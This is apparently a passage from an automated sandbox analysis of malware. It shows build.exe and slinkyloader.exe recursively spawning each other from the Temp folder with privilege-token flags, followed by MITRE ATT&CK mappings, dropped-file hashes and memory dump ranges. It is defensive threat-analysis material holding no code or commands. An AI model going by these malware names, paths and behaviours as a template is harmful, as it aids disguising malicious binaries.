        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        42⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        42⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        43⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        43⤵
        
        PID:416
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        44⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3112
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        44⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        45⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3804
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        45⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        46⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        46⤵
        
        PID:6216
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        47⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        47⤵
        
        PID:6352
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        48⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6432
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        48⤵
        
        PID:6488
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        49⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6568
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        49⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        50⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6704
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        50⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        51⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6840
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        51⤵
        
        PID:6896
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        52⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6980
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        52⤵
        
        PID:7036
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        53⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        53⤵
        
        PID:5424
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        54⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        54⤵
        
        PID:6284
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        55⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        55⤵
        
        PID:6504
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        56⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6644
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        56⤵
        
        PID:6820
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        57⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        57⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        58⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        58⤵
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        59⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        59⤵
        
        PID:6564
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        60⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6764
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        60⤵
        
        PID:3432
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        61⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6228
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        61⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        62⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4088
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        62⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        63⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        63⤵
        
        PID:7204
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        64⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7284
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        64⤵
        
        PID:7340
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        65⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7420
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        65⤵
        
        PID:7476
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        66⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7556
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        66⤵
        
        PID:7612
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        67⤵
        
        PID:7692
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        67⤵
        
        PID:7748
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        68⤵
        
        PID:7828
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        68⤵
        
        PID:7884
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        69⤵
        
        PID:7964
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        69⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        70⤵
        
        PID:8104
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        70⤵
        
        PID:8160
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        71⤵
        
        PID:7212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        72⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        71⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        72⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        72⤵
        
        PID:7536
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        73⤵
        
        PID:7668
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        73⤵
        
        PID:6184
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        74⤵
        
        PID:6336
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        74⤵
        
        PID:7952
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        75⤵
        
        PID:8168
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        75⤵
        
        PID:6696
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        76⤵
        
        PID:7208
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        76⤵
        
        PID:4240
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        77⤵
        
        PID:7820
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        77⤵
        
        PID:7160
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        78⤵
        
        PID:5564
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        78⤵
        
        PID:7360
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        79⤵
        
        PID:7480
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        79⤵
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        80⤵
        
        PID:7848
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        80⤵
        
        PID:8200
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        81⤵
        
        PID:8280
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        81⤵
        
        PID:8336
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        82⤵
        
        PID:8416
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        82⤵
        
        PID:8472
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        83⤵
        
        PID:8552
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        83⤵
        
        PID:8608
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        84⤵
        
        PID:8688
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        84⤵
        
        PID:8748
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        85⤵
        
        PID:8828
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        85⤵
        
        PID:8884
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        86⤵
        
        PID:8968
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        86⤵
        
        PID:9024
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        87⤵
        
        PID:9104
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        87⤵
        
        PID:9160
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        88⤵
        
        PID:6560
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        88⤵
        
        PID:8256
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        89⤵
        
        PID:8360
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        89⤵
        
        PID:6508
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        90⤵
        
        PID:7676
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        90⤵
        
        PID:8620
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        91⤵
        
        PID:8748
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        91⤵
        
        PID:8964
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        92⤵
        
        PID:9168
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        92⤵
        
        PID:9184
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        93⤵
        
        PID:8268
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        93⤵
        
        PID:8668
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        94⤵
        
        PID:8980
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        94⤵
        
        PID:8620
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        95⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        95⤵
        
        PID:8264
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        96⤵
        
        PID:8120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        97⤵
        
        PID:8668
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        96⤵
        
        PID:9180
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        97⤵
        
        PID:8544
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        97⤵
        
        PID:9228
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        98⤵
        
        PID:9308
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        98⤵
        
        PID:9364
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4184" "3376" "3344" "3372" "0" "0" "3380" "0" "0" "0" "0" "0"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\slinkyloader.exe.log

Filesize
654B

MD5
16c5fce5f7230eea11598ec11ed42862

SHA1
75392d4824706090f5e8907eee1059349c927600

SHA256
87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

SHA512
153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ufkvghcw.tft.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\build.exe

Filesize
95KB

MD5
e82e9c27abe2f4f77cb05cc4d36b6736

SHA1
e8f4cb07a0b30ffadc585b125e4ed5577fb5c082

SHA256
75cf40e9e24116604d9cf309a4d55ae038c00da24c05a2f0fe7057793cd5adcc

SHA512
e995d757b7fad0ad541010e89c3b54d872293139565d18792c2a9fa14749b934f475c3d0c5b1ff1d5fa951989d36ac3fcf06763812fafa476b9f39b5697a8c89

Download Submit
C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe

Filesize
17.5MB

MD5
0e2e98f4e97316c7d6613bb10149fcf1

SHA1
dffa4e7ec86befeec114f7a7e5ceaf752e7b84f4

SHA256
bb250b5edfed1c3d0a8bac249f57ec5971b34d8435b7657bf3e57a73556ecfdd

SHA512
a232ee6ae96cf87fdc2633639474b27ac08bb691fbe690da151a761a167fffa555fd3da0a5ce7ca0b66097c5fb476890b754a8cf9527c5d8328b1550f71991a1

Download Submit
memory/3080-59-0x00007FF8E9AD0000-0x00007FF8EA4BC000-memory.dmp

Filesize
9.9MB

Download
memory/3080-48-0x000000001C0E0000-0x000000001C0F0000-memory.dmp

Filesize
64KB

Download
memory/3080-46-0x0000000000330000-0x00000000014C2000-memory.dmp

Filesize
17.6MB

Download
memory/3080-45-0x00007FF8E9AD0000-0x00007FF8EA4BC000-memory.dmp

Filesize
9.9MB

Download
memory/4184-44-0x000001B38B1E0000-0x000001B38B1F0000-memory.dmp

Filesize
64KB

Download
memory/4184-10-0x000001B3A3A70000-0x000001B3A3AE6000-memory.dmp

Filesize
472KB

Download
memory/4184-29-0x000001B38B1E0000-0x000001B38B1F0000-memory.dmp

Filesize
64KB

Download
memory/4184-30-0x000001B3A4610000-0x000001B3A57A8000-memory.dmp

Filesize
17.6MB

Download
memory/4184-33-0x000001B3A39F0000-0x000001B3A3A00000-memory.dmp

Filesize
64KB

Download
memory/4184-27-0x00007FF8E9AD0000-0x00007FF8EA4BC000-memory.dmp

Filesize
9.9MB

Download
memory/4184-4-0x000001B3A38C0000-0x000001B3A38E2000-memory.dmp

Filesize
136KB

Download
memory/4184-26-0x000001B38B1D0000-0x000001B38B1D8000-memory.dmp

Filesize
32KB

Download
memory/4184-21-0x000001B38B1E0000-0x000001B38B1F0000-memory.dmp

Filesize
64KB

Download
memory/4184-28-0x000001B38B1E0000-0x000001B38B1F0000-memory.dmp

Filesize
64KB

Download
memory/4184-6-0x000001B38B1E0000-0x000001B38B1F0000-memory.dmp

Filesize
64KB

Download
memory/4184-76-0x00007FF8E9AD0000-0x00007FF8EA4BC000-memory.dmp

Filesize
9.9MB

Download
memory/4184-7-0x000001B38B1E0000-0x000001B38B1F0000-memory.dmp

Filesize
64KB

Download
memory/4184-5-0x00007FF8E9AD0000-0x00007FF8EA4BC000-memory.dmp

Filesize
9.9MB

Download
memory/4412-58-0x0000000005370000-0x0000000005382000-memory.dmp

Filesize
72KB

Download
memory/4412-56-0x0000000005A20000-0x0000000006026000-memory.dmp

Filesize
6.0MB

Download
memory/4412-60-0x0000000005410000-0x000000000544E000-memory.dmp

Filesize
248KB

Download
memory/4412-63-0x0000000005390000-0x00000000053DB000-memory.dmp

Filesize
300KB

Download
memory/4412-64-0x0000000005680000-0x000000000578A000-memory.dmp

Filesize
1.0MB

Download
memory/4412-53-0x0000000000A10000-0x0000000000A2E000-memory.dmp

Filesize
120KB

Download